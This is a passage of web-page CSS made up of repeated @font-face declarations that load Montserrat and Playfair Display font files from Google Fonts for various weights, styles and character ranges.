url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: 